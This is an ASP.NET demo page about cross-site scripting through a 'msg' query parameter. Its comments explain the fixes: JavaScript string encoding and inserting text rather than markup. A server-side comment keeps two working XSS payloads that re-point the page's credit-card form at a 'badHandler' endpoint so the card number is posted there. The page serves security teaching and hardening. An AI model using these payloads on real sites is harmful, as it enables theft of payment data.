﻿<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="CSSAttack.aspx.cs" Inherits="Skynet.WebSite.Demos.CSSAttack" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
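<head runat="server">
    <title></title>
    <%-- jQuery is fetched over HTTPS so the library cannot be altered in transit and is not
         blocked as mixed content when this page is served over TLS.
         NOTE(review): 1.4.2 is a very old release. Plan an upgrade to a maintained version and
         add Subresource Integrity (integrity + crossorigin attributes) using the hash published
         for the exact file that ends up being referenced. --%>
    <script src="https://code.jquery.com/jquery-1.4.2.min.js" type="text/javascript">
    </script>    
</head>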
<body>
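    <%-- Output-encoding notes for the msg query-string parameter (server-side comment: it is
         removed before the response is sent and nothing inside it is evaluated).

         The value is written into a JavaScript string literal, so it needs JavaScript string
         encoding. HTML encoding (HttpUtility.HtmlEncode, or the colon code-nugget syntax the
         page used before) is the wrong encoder for this context: it leaves backslash escape
         sequences untouched, the script engine decodes them back into markup characters after
         the encoder has run, and jQuery's .html() then parses the result as HTML.

         The alternative encodings used to sit in "//" comments inside the script. Code nuggets
         in client-side comments are still evaluated by the server, and HtmlEncode does not
         encode line breaks, so a commented-out variant was never inert. They are described
         here instead of being left in the emitted script. --%>
    <script type="text/javascript">
        $(function () {
            // msg comes straight from the query string and must be treated as untrusted.
            // JavaScriptStringEncode keeps it inside the string literal (quotes, backslashes,
            // line breaks and angle brackets are escaped); a missing parameter yields ''.
            var msg = '<%= HttpUtility.JavaScriptStringEncode(Request.QueryString["msg"]) %>';

            // .text() inserts the value as a text node. .html() would parse it as markup,
            // which turns any tag in the decoded string into live DOM (DOM-based XSS).
            $('#divInput').hide().text(msg).show('slow');
        });
    </script>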
    <div id="divInput"  style=" display:inline;  font-size:2em;">  </div>
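    <form id="form1" runat="server">
    <div>            
        <%-- Demo inputs for the msg parameter, kept for reference. They are held in a
             server-side comment so they are not delivered to every visitor in the page source.
             Both try to re-point this form's action at another handler so that the card number
             entered below would be posted there:
               1. closes the JavaScript string literal with a quote; this only works when the
                  value is written without any encoding;
               2. relies on JavaScript hex escapes, which HTML encoding does not touch.
             Mitigation: JavaScript-string-encode the value where it is written into script,
             and insert it into the DOM as text rather than as markup.

        msg=welcome';document.forms%5b0%5d%5b'action'%5d+%3D+'http://localhost:63195/Demos/badHandler.ashx';%20var%20x%20=%20'
        msg=welcome\x3cscript%20defer\x3edocument.forms%5b0%5d%5b\x27action\x27%5d+%3D+\x27http://localhost:63195/Demos/badHandler.ashx\x27;\r\n\x3c/script\x3e
        --%>
        <p>Credit card </p>      
        <asp:TextBox ID="txtCreditCard" runat="server"></asp:TextBox>
        <asp:Button ID="btnSummit" runat="server" Text="Button" 
            onclick="btnSummit_Click"   />
        <%-- Disabled sample output. An HTML comment does not stop the server from evaluating
             the expression and writing the request value into the response, so the line is
             held in a server-side comment instead. JavaScriptStringEncode is also the wrong
             encoder for HTML body text; use HtmlEncode if this is ever re-enabled.
             <p> <%=   HttpUtility.JavaScriptStringEncode(Request.QueryString["msg"]) %> </p> --%>

        <asp:Label ID="Label1" runat="server" Text=""></asp:Label>
    </div>
    </form>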
</body>
</html>
